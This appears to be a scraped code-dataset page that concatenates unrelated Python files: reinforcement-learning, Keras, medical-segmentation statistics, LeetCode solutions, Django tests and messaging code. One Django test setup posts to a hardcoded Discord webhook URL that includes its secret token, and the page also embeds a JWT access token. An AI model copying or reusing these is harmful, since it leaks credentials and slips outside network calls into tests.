to the terms of the software license set\n# forth in the LICENSE file included with this software, and also available at\n# https://github.com/AdeDZY/K-NRM/blob/master/LICENSE\n\nfrom os import path\n\nROOTPATH = path.dirname(path.dirname(path.dirname(path.abspath(__file__))))\nquery_field = 'query'\ntitle_field = 'title'\nbody_field = 'body'\n"},"size":{"kind":"number","value":438,"string":"438"}}},{"rowIdx":898,"cells":{"max_stars_repo_path":{"kind":"string","value":"python/hardway/ex17_1.py"},"max_stars_repo_name":{"kind":"string","value":"petervdb/eLearning"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024442"},"content":{"kind":"string","value":"from sys import argv\nfrom os.path import exists\n\n# short version of ex17_0.py\n# The script requires 2 arguments. The original filename and the new filename\nscript, from_file, to_file = argv\n\nprint \"Copying from %s to %s\" % (from_file, to_file)\n\nindata = open(from_file).read()\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nout_file.close()\n"},"size":{"kind":"number","value":349,"string":"349"}}},{"rowIdx":899,"cells":{"max_stars_repo_path":{"kind":"string","value":"LocaleStringBuilder.py"},"max_stars_repo_name":{"kind":"string","value":"FlasHAdi/LocaleString-LocaleQuest-Builder"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024497"},"content":{"kind":"string","value":"__author__ = \"Owsap\"\r\n__copyright__ = \"Copyright 2020, Owsap Productions\"\r\n__license__ = \"MIT\"\r\n__version__ = \"1.0.0\"\r\n\r\nimport os\r\nimport sys\r\nimport logging\r\n\r\nLOG_FILE_NAME = \"LocaleStringBuilder.log\" # Log file\r\nLOCALE_STRING_FILE = \"locale_string.txt\" # Locale string file name\r\nLOCALE_STRING_BASE_FILE = \"share/locale_string_vnum.txt\" # Reference file name (String VNUM)\r\n\r\nif not os.path.exists(\"log\"):\r\n\tos.mkdir(\"log\")\r\n\r\nlogging.basicConfig(filename = \"log/\" + LOG_FILE_NAME, level = logging.DEBUG, format = '%(asctime)s %(message)s', datefmt = '%d/%m/%Y %H:%M:%S')\r\n\r\ndef GetLocaleStringFile(locale):\r\n\treturn \"locale/%s/%s\" % (locale, LOCALE_STRING_FILE)\r\n\r\ndef TransalteLocaleString(locale):\r\n\tif not os.path.exists(LOCALE_STRING_BASE_FILE):\r\n\t\tprint \"Reference file not found. %s\" % LOCALE_STRING_BASE_FILE\r\n\t\tlogging.warning(\"Reference file not found. %s\" % LOCALE_STRING_BASE_FILE)\r\n\t\treturn\r\n\r\n\tlocaleStringOutput = \"locale_string_%s.txt\" % locale\r\n\tif os.path.exists(localeStringOutput):\r\n\t\tos.remove(localeStringOutput)\r\n\r\n\tfileOutput = open(localeStringOutput, 'a')\r\n\tfor line in open(LOCALE_STRING_BASE_FILE, 'r'):\r\n\t\tsplit = line.split('\";')\r\n\t\tvnum = split[0][1:]\r\n\r\n\t\tif not vnum:\r\n\t\t\tprint \"\"\r\n\t\t\tfileOutput.write(\"\")\r\n\r\n\t\tif not vnum.isdigit():\r\n\t\t\tformated = split[0] + \"\\\";\"\r\n\t\t\tprint (formated.rsplit(\"\\n\", 1)[0])\r\n\t\t\tfileOutput.write(formated.rsplit(\"\\n\")[0] + \"\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tprint GetTranslationVnum(locale, vnum)\r\n\t\tfileOutput.write(GetTranslationVnum(locale, vnum) + \"\\n\")\r\n\r\n\tfileOutput.close()\r\n\r\ndef GetTranslationVnum(locale, vnum):\r\n\tlineCount = 0\r\n\tfor line in open(GetLocaleStringFile(locale), 'r'):\r\n\t\tlineCount += 1\r\n\t\tmatch = line.find(vnum)\r\n\t\tif match == 0:\r\n\t\t\tlocaleStringFile = open(GetLocaleStringFile(locale), 'r')\r\n\t\t\tlocaleText = str(localeStringFile.readlines()[lineCount - 1])\r\n\t\t\tsplit = localeText.split(\"\\t\")\r\n\t\t\tformated = \"\\\"\" + split[1]\r\n\r\n\t\t\treturn (formated.rsplit(\"\\n\", 1)[0]) + \"\\\";\"\r\n\r\nif __name__ == \"__main__\":\r\n\tif len(sys.argv) < 2:\r\n\t\tprint \"USAGE: [locale]\"\r\n\t\tlocale = raw_input(\"Enter locale name: \")\r\n\t\tTransalteLocaleString(str(locale))\r\n\r\n\telif len(sys.argv) == 2:\r\n\t\tTransalteLocaleString(sys.argv[1])\r\n"},"size":{"kind":"number","value":2189,"string":"2,189"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":8,"numItemsPerPage":100,"numTotalItems":129320,"offset":800,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjM5NjAwMSwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9zdGFyY29kZXJkYXRhX3B5X3Ntb2wiLCJleHAiOjE3NTYzOTk2MDEsImlzcyI6Imh0dHBzOi8vaHVnZ2luZ2ZhY2UuY28ifQ.EFgdtuHRJw-wCktOV4DGWF3B3m-v8QZLTUWU7CIQSZMFQ_Sfp6blPPy72sXkaNiiGrEAVO0rVysmiwUpH_G8Bw","displayUrls":true},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
#!/usr/bin/env python
# coding=utf-8
'''
Author: John
Email: <EMAIL>
Date: 2021-03-12 16:14:34
LastEditor: John
LastEditTime: 2021-05-05 16:58:39
Discription:
Environment:
'''
import numpy as np
from collections import defaultdict
import torch
import dill
class FisrtVisitMC:
''' On-Policy First-Visit MC Control
'''
def __init__(self,n_actions,cfg):
self.n_actions = n_actions
self.epsilon = cfg.epsilon
self.gamma = cfg.gamma
self.Q_table = defaultdict(lambda: np.zeros(n_actions))
self.returns_sum = defaultdict(float) # sum of returns
self.returns_count = defaultdict(float)
def choose_action(self,state):
''' e-greed policy '''
if state in self.Q_table.keys():
best_action = np.argmax(self.Q_table[state])
action_probs = np.ones(self.n_actions, dtype=float) * self.epsilon / self.n_actions
action_probs[best_action] += (1.0 - self.epsilon)
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
else:
action = np.random.randint(0,self.n_actions)
return action
def update(self,one_ep_transition):
# Find all (state, action) pairs we've visited in this one_ep_transition
# We convert each state to a tuple so that we can use it as a dict key
sa_in_episode = set([(tuple(x[0]), x[1]) for x in one_ep_transition])
for state, action in sa_in_episode:
sa_pair = (state, action)
# Find the first occurence of the (state, action) pair in the one_ep_transition
first_occurence_idx = next(i for i,x in enumerate(one_ep_transition)
if x[0] == state and x[1] == action)
# Sum up all rewards since the first occurance
G = sum([x[2]*(self.gamma**i) for i,x in enumerate(one_ep_transition[first_occurence_idx:])])
# Calculate average return for this state over all sampled episodes
self.returns_sum[sa_pair] += G
self.returns_count[sa_pair] += 1.0
self.Q_table[state][action] = self.returns_sum[sa_pair] / self.returns_count[sa_pair]
def save(self,path):
'''把 Q表格 的数据保存到文件中
'''
torch.save(
obj=self.Q_table,
f=path+"Q_table",
pickle_module=dill
)
def load(self, path):
'''从文件中读取数据到 Q表格
'''
self.Q_table =torch.load(f=path+"Q_table",pickle_module=dill)
2,511
Head Pose Estimation/keras_NN.py
nixingyang/Kaggle-Face-Verification
0
2024241
from keras.callbacks import ModelCheckpoint
from keras.layers.advanced_activations import PReLU
from keras.layers.core import Activation, Dense, Dropout
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder, StandardScaler
import numpy as np
def preprocess_data(X, scaler=None):
if not scaler:
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
def generate_prediction(X_train, Y_train, X_test, is_classification, \
layer_size=512, layer_num=3, dropout_ratio=0.5, \
batch_size=128, nb_epoch=100, validation_split=0.2):
print("Initiate a model ...")
model = Sequential()
model.add(Dense(layer_size, input_shape=(X_train.shape[1],)))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(dropout_ratio))
for _ in range(layer_num - 1):
model.add(Dense(layer_size))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(dropout_ratio))
if is_classification:
unique_labels = np.unique(Y_train)
model.add(Dense(unique_labels.size))
model.add(Activation("softmax"))
model.compile(loss="categorical_crossentropy", optimizer="adam")
else:
model.add(Dense(1))
model.compile(loss="mean_absolute_error", optimizer="rmsprop")
print("Perform normalization ...")
X_train, scaler = preprocess_data(X_train)
X_test, _ = preprocess_data(X_test, scaler)
print("Perform training phase ...")
optimal_model_file_path = "/tmp/optimal_model.hdf5"
checkpointer = ModelCheckpoint(filepath=optimal_model_file_path,
save_best_only=True)
if is_classification:
categorical_Y_train, encoder = preprocess_labels(Y_train)
model.fit(X_train, categorical_Y_train, batch_size=batch_size, nb_epoch=nb_epoch, \
callbacks=[checkpointer], validation_split=validation_split)
else:
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, \
callbacks=[checkpointer], validation_split=validation_split)
print("Load optimal coefficients ...")
model.load_weights(optimal_model_file_path)
print("Generate prediction ...")
if is_classification:
classes = model.predict_classes(X_test, batch_size=batch_size)
prediction = encoder.inverse_transform(classes)
else:
prediction = model.predict(X_test, batch_size=batch_size)
return prediction
2,939
hardfork/coinclients/exceptions.py
topor-dev/hardfork-tracker
0
2024139
class BaseCoinClientException(Exception):
pass
class CoinClientUnexpectedException(BaseCoinClientException):
pass
__all__ = ['BaseCoinClientException', 'CoinClientUnexpectedException']
import os
from mp.paths import JIP_dir
import numpy as np
from skimage.measure import label,regionprops
import matplotlib.pyplot as plt
import math
from sklearn.mixture import GaussianMixture
#set environmental variables
#for data_dirs folder, nothing changed compared to Simons version
os.environ["WORKFLOW_DIR"] = os.path.join(JIP_dir, 'data_dirs')
os.environ["OPERATOR_IN_DIR"] = "input"
os.environ["OPERATOR_OUT_DIR"] = "output"
os.environ["OPERATOR_TEMP_DIR"] = "temp"
os.environ["OPERATOR_PERSISTENT_DIR"] = os.path.join(JIP_dir, 'data_dirs', 'persistent')
# preprocessing dir and subfolders
os.environ["PREPROCESSED_WORKFLOW_DIR"] = os.path.join(JIP_dir, 'preprocessed_dirs')
os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR"] = "output_scaled"
os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR_TRAIN"] = "output_scaled_train"
#dir where train data for intensites is stored (this only needs to be trains_dirs, but since i have more
# datasets, another subfolder is here)
os.environ["TRAIN_WORKFLOW_DIR"] = os.path.join(JIP_dir, 'train_dirs')
#ignore
##below is for christian only, used for older data structures where models are trained on
os.environ["TRAIN_WORKFLOW_DIR_GT"] = os.path.join('Covid-RACOON','All images and labels')
os.environ["TRAIN_WORKFLOW_DIR_PRED"] = os.path.join('Covid-RACOON','All predictions')
#os.environ["TRAIN_WORKFLOW_DIR_GT"] = os.path.join('gt_small')
#os.environ["TRAIN_WORKFLOW_DIR_PRED"] = os.path.join('pred_small')
#which mode is active either 'train' or 'inference'
os.environ["INFERENCE_OR_TRAIN"] = 'train'
#ignore
# the ending of the image files in train_dir is only for older datasets
os.environ["INPUT_FILE_ENDING"] = 'nii.gz'
from mp.utils.preprocess_utility_functions import basic_preprocessing
from mp.utils.preprocess_utility_functions import extract_features_all_data,compute_all_prediction_dice_scores
from train_restore_use_models.train_int_based_quantifier import train_dice_predictor
from mp.utils.intensities import sample_intensities
from mp.models.densities.density import Density_model
from mp.utils.feature_extractor import Feature_extractor
## work on variable 3, connected components
def poisson(lam,b):
return ((lam**b) * np.exp(-lam)) /np.math.factorial(b)
def gaussian(mu,std,b):
return ((1 / (np.sqrt(2 * np.pi) * std)) *
np.exp(-0.5 * (1 / std * (b - mu))**2))
def load_seg_features():
features = []
dens = Density_model()
feat_extr = Feature_extractor(dens)
work_path = os.path.join(os.environ["PREPROCESSED_WORKFLOW_DIR"],os.environ["PREPROCESSED_OPERATOR_OUT_SCALED_DIR_TRAIN"])
for id in os.listdir(work_path):
id_path = os.path.join(work_path,id)
seg_path_short = os.path.join(id_path,'seg')
seg_features_path = os.path.join(seg_path_short,'features.json')
feat_vec = feat_extr.read_feature_vector(seg_features_path)
if not np.isnan(np.sum(np.array(feat_vec))):
features.append(feat_vec)
return np.array(features)
def plot_conn_comp(data,save=True,fit=True):
save_path = os.path.join('storage','Results','histogramms','connected components poisson')
mu = np.mean(data)
std = np.std(data)
_ , bins, _ = plt.hist(data,75,(0,np.max(data)),density=True)
if fit:
y = [poisson(mu,b) for b in bins]
plt.plot(bins,y,'--')
plt.title('Segmentations connected components gaussian')
if save:
plt.savefig(save_path)
plt.show()
def conn_comp_n_percent(data,percent):
hist, bin_edges = np.histogram(data,bins=np.arange(0,np.max(data),step=1),density=True)
cum_hist = np.cumsum(hist)
for i in range(len(cum_hist)):
if cum_hist[i]>percent:
return math.ceil(bin_edges[i])
## work for avg slice dice
def plot_slice_dice_hist(data,save=False):
_ , _, _ = plt.hist(data,50,(np.min(data),1),density=True)
plt.show()
def slice_dice_n_percent(data,percent):
bins = np.arange(np.min(data),1,step=0.001)
hist, bin_edges = np.histogram(data,bins=bins)
total_points = np.sum(hist)
dens = np.array(hist)/total_points
dens_flipped = np.flip(dens)
dens_flipped_cumsum = np.cumsum(dens_flipped)
for i in range(len(dens_flipped_cumsum)):
if dens_flipped_cumsum[i]>percent:
return bin_edges[total_points-1-i]
## work for int mode
def plot_int_mode_hist(data,threshholds=[],save=False):
#get histogram
_ , bins, _ = plt.hist(data,100,(0,1),density=True)
#get gaussian fit
gm = GaussianMixture(n_components=2).fit(np.reshape(data,(-1,1)))
means = [gm.means_[0][0],gm.means_[1][0]]
vars = [gm.covariances_[0][0][0],gm.covariances_[1][0][0]]
weights = [gm.weights_[0],gm.weights_[1]]
y0 = weights[0]*np.array([gaussian(means[0],vars[0]**(1/2),b) for b in bins])
y1 = weights[1]*np.array([gaussian(means[1],vars[1]**(1/2),b) for b in bins])
y = y0 + y1
plt.plot(bins,y)
plt.vlines(threshholds,0,5,colors="r")
plt.show()
def int_mode_n_percent(data,percent):
data = np.reshape(data,(-1,1))
#first fit a mixture with 2 components to find 2 modes
gm = GaussianMixture(n_components=2).fit(data)
if gm.means_[0][0] < gm.means_[1][0]:
means = [gm.means_[0][0],gm.means_[1][0]]
vars = [gm.covariances_[0][0][0],gm.covariances_[1][0][0]]
weights = [gm.weights_[0],gm.weights_[1]]
# try to balance the steplengths, according to weights and cov
step_0 = vars[0]*weights[0]
step_1 = vars[1]*weights[1]
else:
means = [gm.means_[1][0],gm.means_[0][0]]
vars = [gm.covariances_[1][0][0],gm.covariances_[0][0][0]]
weights = [gm.weights_[1],gm.weights_[0]]
# try to balance the steplengths, according to weights and std
step_0 = (vars[0]**(1/2))*(1/20)*weights[0]
step_1 = (vars[1]**(1/2))*(1/20)*weights[1]
#find the threshholds
hist_0, bins_0 = np.histogram(data,np.arange(0,1,step_0))
hist_1, bins_1 = np.histogram(data,np.arange(0,1,step_1))
number_points = np.sum(hist_0)
hist_0 = np.array(hist_0)/number_points
hist_1 = np.array(hist_1)/number_points
hist = [hist_0,hist_1]
bins = [bins_0,bins_1]
mode_0_bin = np.argmax(bins[0]>means[0])
mode_1_bin = np.argmax(bins[1]>means[1])
mode_bins = [mode_0_bin,mode_1_bin]
# if the intervalls are overlapping, inner intervalls are not increased in this case
overlapping = False
complete_0 = False
complete_1 = False
i = 0
mass = 0
while mass<percent:
# check whether intervalls are overlapping
if bins[1][mode_bins[1]-i] < bins[0][mode_bins[0]+i+1] and not overlapping:
#add the bigger bin to the mass
overlapping = True
if weights[0]>weights[1]:
mass = mass + hist[0][mode_bins[0]+i]
else:
mass = mass + hist[1][mode_bins[1]-i]
if mode_bins[0]-i < 0 or mode_bins[0]+i > len(hist[0]):
complete_0 = True
if mode_bins[1]-i < 0 or mode_bins[1]+i > len(hist[1]):
complete_1 = True
#if both ditributions have reached their end break the loop
if complete_1 or complete_0 :
break
#add masses
if i == 0:
mass = hist[0][mode_bins[0]]+hist[1][mode_bins[1]]
if overlapping:
mass = mass + hist[0][mode_bins[0]-i]+hist[1][mode_bins[1]+1]
else:
mass0 = hist[0][mode_bins[0]-i]+hist[0][mode_bins[0]+i]
mass1 = hist[1][mode_bins[1]+i]+hist[1][mode_bins[1]-i]
mass = mass + mass0 + mass1
i = i + 1
if overlapping:
return [bins[0][mode_bins[0]-i+1],bins[1][mode_bins[1]+i]]
else:
return [bins[0][mode_bins[0]-i+1],bins[0][mode_bins[0]+i],bins[1][mode_bins[1]-i+1],bins[1][mode_bins[1]+i]]
def main(conn_comp=True,slice_dice=True,int_mode=True):
features = load_seg_features()
if conn_comp:
## variable 3, connected comp
plot_conn_comp(features[:,3],False,False)
thresh = conn_comp_n_percent(features[:,3],0.99)
print('The recommended threshold for connected components is {}'.format(thresh))
if slice_dice:
data = features[:,1]
plot_slice_dice_hist(data)
thresh = slice_dice_n_percent(data,0.99)
print('The recommended threshold for slice dices is {}'.format(thresh))
if int_mode:
data = features[:,4]
threshholds = int_mode_n_percent(data,0.80)
print(threshholds)
plot_int_mode_hist(data,threshholds)
if __name__ == "__main__":
main(False,False,True)
8,866
leetcode/268-missing-number.py
AmrMKayid/KayAlgo
1
2024123
class Solution:
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
missing = len(nums)
for index, num in enumerate(nums):
missing ^= index ^ num
return missing
231
python/443.string-compression.py
fengbaoheng/leetcode
1
2024440
#
# @lc app=leetcode.cn id=443 lang=python3
#
# [443] 压缩字符串
#
# https://leetcode-cn.com/problems/string-compression/description/
#
# algorithms
# Easy (33.53%)
# Total Accepted: 3.5K
# Total Submissions: 10.5K
# Testcase Example: '["a","a","b","b","c","c","c"]'
#
# 给定一组字符,使用原地算法将其压缩。
#
# 压缩后的长度必须始终小于或等于原数组长度。
#
# 数组的每个元素应该是长度为1 的字符(不是 int 整数类型)。
#
# 在完成原地修改输入数组后,返回数组的新长度。
#
#
#
# 进阶:
# 你能否仅使用O(1) 空间解决问题?
#
#
#
# 示例 1:
#
#
# 输入:
# ["a","a","b","b","c","c","c"]
#
# 输出:
# 返回6,输入数组的前6个字符应该是:["a","2","b","2","c","3"]
#
# 说明:
# "aa"被"a2"替代。"bb"被"b2"替代。"ccc"被"c3"替代。
#
#
# 示例 2:
#
#
# 输入:
# ["a"]
#
# 输出:
# 返回1,输入数组的前1个字符应该是:["a"]
#
# 说明:
# 没有任何字符串被替代。
#
#
# 示例 3:
#
#
# 输入:
# ["a","b","b","b","b","b","b","b","b","b","b","b","b"]
#
# 输出:
# 返回4,输入数组的前4个字符应该是:["a","b","1","2"]。
#
# 说明:
# 由于字符"a"不重复,所以不会被压缩。"bbbbbbbbbbbb"被“b12”替代。
# 注意每个数字在数组中都有它自己的位置。
#
#
# 注意:
#
#
# 所有字符都有一个ASCII值在[35, 126]区间内。
# 1 <= len(chars) <= 1000。
#
#
#
from typing import List
class Solution:
# 快慢指针
def compress(self, chars: List[str]) -> int:
if chars is None:
return 0
length = len(chars)
if length == 0 or length == 1:
return length
p, qs, qe = 0, 0, 0
while True:
# 记录字符
chars[p] = chars[qs]
p += 1
# 快指针计算字符出现的次数
while qe < length and chars[qe] == chars[qs]:
qe += 1
count = qe - qs
# 字符出现超过1次,则追加次数
if count > 1:
count_char = list(str(count))
for i in range(len(count_char)):
chars[p] = count_char[i]
p += 1
# 判断是否遍历完数组
if qe == length:
break
qs = qe
return p
letter = set()
alph = input()
for i in alph:
letter.add(i)
word = input()
largo = len(word)
rangoLargo = range(largo)
words = set()
for x in letter:
for i in rangoLargo:
word2 = word[0:i] + x + word[i:largo]
words.add(word2)
words.add(word + x)
for i in rangoLargo:
words.add(word[0:i] + word[i + 1: largo])
for x in letter:
for i in rangoLargo:
words.add(word[0:i] + x + word[i + 1: largo])
words = list(words)
words.sort()
for x in words:
if x != word:
print(x)
513
src/xsd_trips/tests.py
minyiky/xSACdb
0
2023636
import random
import requests
from django.contrib.auth.models import Group
from django.core.exceptions import PermissionDenied
from discord import Webhook, RequestsWebhookAdapter
from xSACdb.roles.groups import GROUP_TRIPS
from xSACdb.test_helpers import BaseTest
from xsd_auth.models import User
from xsd_frontend.tests import fake
from xsd_trips.models import Trip
class BaseTripTest(BaseTest):
def setUp(self):
self.member = User.objects.fake_single(self.fake)
self.trip_organiser = User.objects.fake_single(self.fake)
self.do = User.objects.fake_single(self.fake)
self.do.groups.add(Group.objects.get(pk=GROUP_TRIPS))
self.new_trip = self.create_a_trip()
self.open_trip = self.create_a_trip()
self.open_trip.set_approved(self.do)
self.open_trip.set_open(self.do)
def create_a_trip(self):
webhook = Webhook.from_url("https://discord.com/api/webhooks/839835947872288768/j-JqFQ6D-3SjRn9mPo_8TuU1dibzG9ykuQh6nGPgjovbv3zXrMIvXrQDnq22UwpZFVKU", adapter=RequestsWebhookAdapter())
webhook.send("Hello World")
return Trip.objects.create(
name=self.fake.name(),
date_start=self.fake.date_time_between(start_date='now', end_date='+10y').date(),
description='\n\n'.join(fake.paragraphs(nb=random.randrange(1, 4))),
owner=self.trip_organiser.profile,
)
class TripManagerTest(BaseTripTest):
def test_upcoming_hidden(self):
# Test a trip that hasn't been approved yet doesn't show up in the 'upcoming' list
self.assertFalse(self.new_trip in Trip.objects.upcoming())
def test_upcoming_hidden_all(self):
# Test a trip that hasn't been approved yet does show up in upcoming all
self.assertTrue(self.new_trip in Trip.objects.upcoming_all())
def test_upcoming_open(self):
# Test an open trip shows in upcoming
self.assertTrue(self.open_trip in Trip.objects.upcoming())
def test_private(self):
# New trips show in private
self.assertTrue(self.new_trip in Trip.objects.private())
class TripStateTest(BaseTripTest):
def test_state_class(self):
self.assertEqual(self.new_trip.state_class, 'trip-state-new')
def test_deny_trip(self):
# Member / trip owner cannot deny
self.assertFalse(self.new_trip.is_denied)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.member)
with self.assertRaises(PermissionDenied):
self.new_trip.set_denied(self.trip_organiser)
# DO can
self.new_trip.set_denied(self.do)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_denied)
def test_approve_trip(self):
# Member / trip owner cannot approve
self.assertFalse(self.new_trip.is_approved)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.member)
with self.assertRaises(PermissionDenied):
self.new_trip.set_approved(self.trip_organiser)
# DO can
self.new_trip.set_approved(self.do)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_approved)
def test_cancel_trip(self):
self.assertFalse(self.new_trip.is_cancelled)
# Random member cannot cancel trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.member)
# Organiser cannot open trip before its public
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.set_approved(self.do)
with self.assertRaises(PermissionDenied):
self.new_trip.set_cancelled(self.trip_organiser)
# With public
self.new_trip.set_open(self.do)
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.set_closed(self.do)
self.new_trip.set_cancelled(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_cancelled)
def test_open_trip(self):
self.assertFalse(self.new_trip.is_open)
# Random member cannot open trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_open(self.member)
# Organiser cannot open trip before its approved
with self.assertRaises(PermissionDenied):
self.new_trip.set_open(self.trip_organiser)
# With approval they can
self.new_trip.set_approved(self.do)
self.new_trip.set_open(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_open)
def test_close_trip(self):
self.assertFalse(self.new_trip.is_closed)
# Random member cannot close trip
with self.assertRaises(PermissionDenied):
self.new_trip.set_closed(self.member)
# Organiser cannot open trip before its approved
with self.assertRaises(PermissionDenied):
self.new_trip.set_closed(self.trip_organiser)
# With approval they can
self.new_trip.set_approved(self.do)
self.new_trip.set_closed(self.trip_organiser)
self.new_trip.refresh_from_db()
self.assertTrue(self.new_trip.is_closed)
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
import logging
import os
import sys
from telemetry.core import browser_finder
from telemetry.core import browser_options
from telemetry.page import block_page_benchmark_results
from telemetry.page import csv_page_benchmark_results
from telemetry.page import page_benchmark
from telemetry.page import page_runner
from telemetry.page import page_set
from telemetry.test import discover
def Main(benchmark_dir):
"""Turns a PageBenchmark into a command-line program.
Args:
benchmark_dir: Path to directory containing PageBenchmarks.
"""
benchmarks = discover.DiscoverClasses(benchmark_dir,
os.path.join(benchmark_dir, '..'),
page_benchmark.PageBenchmark)
# Naively find the benchmark. If we use the browser options parser, we run
# the risk of failing to parse if we use a benchmark-specific parameter.
benchmark_name = None
for arg in sys.argv:
if arg in benchmarks:
benchmark_name = arg
options = browser_options.BrowserOptions()
parser = options.CreateParser('%prog [options] <benchmark> <page_set>')
page_runner.PageRunner.AddCommandLineOptions(parser)
parser.add_option('--output-format',
dest='output_format',
default='csv',
help='Output format. Can be "csv" or "block". '
'Defaults to "%default".')
parser.add_option('-o', '--output',
dest='output_file',
help='Redirects output to a file. Defaults to stdout.')
parser.add_option('--output-trace-tag',
dest='output_trace_tag',
help='Append a tag to the key of each result trace.')
benchmark = None
if benchmark_name is not None:
benchmark = benchmarks[benchmark_name]()
benchmark.AddCommandLineOptions(parser)
_, args = parser.parse_args()
if benchmark is None or len(args) != 2:
parser.print_usage()
import page_sets # pylint: disable=F0401
print >> sys.stderr, 'Available benchmarks:\n%s\n' % ',\n'.join(
sorted(benchmarks.keys()))
print >> sys.stderr, 'Available page_sets:\n%s\n' % ',\n'.join(
sorted([os.path.relpath(f)
for f in page_sets.GetAllPageSetFilenames()]))
sys.exit(1)
ps = page_set.PageSet.FromFile(args[1])
benchmark.CustomizeBrowserOptions(options)
possible_browser = browser_finder.FindBrowser(options)
if not possible_browser:
print >> sys.stderr, """No browser found.\n
Use --browser=list to figure out which are available.\n"""
sys.exit(1)
if not options.output_file:
output_file = sys.stdout
elif options.output_file == '-':
output_file = sys.stdout
else:
output_file = open(os.path.expanduser(options.output_file), 'w')
if options.output_format == 'csv':
results = csv_page_benchmark_results.CsvPageBenchmarkResults(
csv.writer(output_file),
benchmark.results_are_the_same_on_every_page)
elif options.output_format in ('block', 'terminal-block'):
results = block_page_benchmark_results.BlockPageBenchmarkResults(
output_file)
else:
raise Exception('Invalid --output-format value: "%s". Valid values are '
'"csv" and "block".'
% options.output_format)
with page_runner.PageRunner(ps) as runner:
runner.Run(options, possible_browser, benchmark, results)
output_trace_tag = ''
if options.output_trace_tag:
output_trace_tag = options.output_trace_tag
elif options.browser_executable:
# When using an exact executable, assume it is a reference build for the
# purpose of outputting the perf results.
# TODO(tonyg): Remove this branch once the perfbots use --output-trace-tag.
output_trace_tag = '_ref'
results.PrintSummary(output_trace_tag)
if len(results.page_failures):
logging.warning('Failed pages: %s', '\n'.join(
[failure['page'].url for failure in results.page_failures]))
if len(results.skipped_pages):
logging.warning('Skipped pages: %s', '\n'.join(
[skipped['page'].url for skipped in results.skipped_pages]))
return min(255, len(results.page_failures))
4,375
smserver/messaging.py
CorySanin/stepmania-server
17
2022832
""" Messaging module
Us to send messages between process and thread
"""
import abc
import queue
from smserver import redis_database
from smserver import event
class Messaging(object):
""" Message class """
def __init__(self, handler=None):
self._handler = handler
def send(self, message):
""" Send a message to all the listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.send(message)
def listen(self):
""" Listen for incomming messages """
if not self._handler:
raise ValueError("No handler configured")
yield from self._handler.listen()
def set_handler(self, handler):
""" Set the handler to use """
self._handler = handler
def stop(self):
""" Stop the message listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.stop()
def clear(self):
""" Clear all the message in the listener """
if not self._handler:
raise ValueError("No handler configured")
self._handler.clear()
class MessageHandler(metaclass=abc.ABCMeta):
""" Abstract class for creating new handler """
@abc.abstractmethod
def send(self, message):
""" How the handler handle the message delivery
:param smserver.event.Event message: Message to send
"""
if not isinstance(message, event.Event):
raise ValueError("Messaging only support Event object")
@abc.abstractmethod
def listen(self):
""" How the handler listen for incomming message """
@abc.abstractmethod
def stop(self):
""" Stop the listener """
def clear(self):
""" Clear the element (if needed) """
class PythonHandler(MessageHandler):
""" Python handler use when using the server in only one process """
def __init__(self):
self._queue = queue.Queue()
def send(self, message):
""" Send the message to the queue """
super().send(message)
self._queue.put(message)
def listen(self):
""" Process message from the queue """
while True:
message = self._queue.get()
if message is None:
break
yield message
self._queue.task_done()
def stop(self):
""" Stop the listener by adding a None element to the queue """
self._queue.put(None)
def clear(self):
""" Clear all the element in the queue (use in test) """
with self._queue.mutex:
self._queue.queue.clear()
class RedisHandler(MessageHandler):
""" Redis Handler. Use pub/sub mechanism """
def __init__(self, channel="socka"):
self.connection = redis_database.new_connection()
self.pubsub = self.connection.pubsub(
ignore_subscribe_messages=True
)
self.channel = channel
self._continue = False
def send(self, message):
""" Send a message through a redis chanel """
super().send(message)
self.connection.publish(self.channel, message.encode())
def listen(self):
""" Listen for message comming through redis """
self._continue = True
self.pubsub.subscribe(self.channel)
while self._continue:
message = self.pubsub.get_message(timeout=0.01)
if not message or message["type"] != "message":
continue
yield event.Event.decode(message["data"])
self.pubsub.unsubscribe(self.channel)
self.pubsub.close()
def stop(self):
""" Stop the listener by adding a None element to the queue """
self._continue = False
_MESSAGING = Messaging()
def set_handler(handler):
""" Add an handler to the global message class """
